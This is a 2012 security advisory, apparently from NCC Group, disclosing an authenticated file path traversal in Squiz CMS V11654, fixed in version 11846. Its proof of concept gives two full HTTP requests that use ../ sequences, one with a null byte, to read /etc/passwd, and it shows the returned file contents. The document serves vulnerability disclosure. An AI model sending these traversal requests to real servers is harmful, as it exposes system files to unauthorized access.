logo
DATABASE RESOURCES PRICING ABOUT US

NGS000330 Technical Advisory: Squiz CMS File Path Traversal

Description

======= Summary ======= Name: Squiz CMS - File Path Traversal Release Date: 30 November 2012 Reference: NGS00330 Discoverer: Robert Ray <robert.ray@ngssecure.com> Vendor: Squiz Vendor Reference: 11846 Systems Affected: Squiz CMS V11654 Risk: High Status: Published ======== TimeLine ======== Discovered: 29 June 2012 Released: 29 June 2012 Approved: 2 July 2012 Reported: 9 July 2012 Fixed: 9 August 2012 Published: 30 November 2012 =========== Description =========== Squiz CMS V11654 - File Path Traversal I. VULNERABILITY ------------------------- The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated attackers to gain access to arbitrary system files. II. BACKGROUND ------------------------- Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, Associations & Not For Profit, Corporate, Finance & Professional Services, Cultural Institutions, Education, Government & Public Sector, Health & Social Services, Media & Publishing, Travel & Tourism etc. http://www.squiz.co.uk/showcase/ III. DESCRIPTION ------------------------- Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is possible for users to self register within the software if configured for this use case. ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- The vulnerabilities detected include method by means of a REST parameter: GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../.././../../../../../etc/passwd HTTP/1.1 Host: cmsdemo.squiz.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: */* Accept-Language: en,en-us;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4 HTTP/1.1 200 OK Content-type: application/octet-stream Expires: Sun, 1 Jul 2012 00:00:00 Last-Modified: Sat, 30 Jun 2012 00:00:00 Content-Length: 1236 Date: Fri, 29 Jun 2012 21:46:36 GMT Server: lighttpd/1.4.28 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown And also by means of the "modeType" GET parameter. GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Host: cmsdemo.squiz.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: */* Accept-Language: en,en-us;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4 HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html; charset=UTF-8 Date: Fri, 29 Jun 2012 19:56:11 GMT Server: lighttpd/1.4.28 Content-Length: 1236 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown =============== Fix Information =============== The vendor has released an update to address this issue. Fixed in version 11846. http://cms.squizsuite.net/download NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a>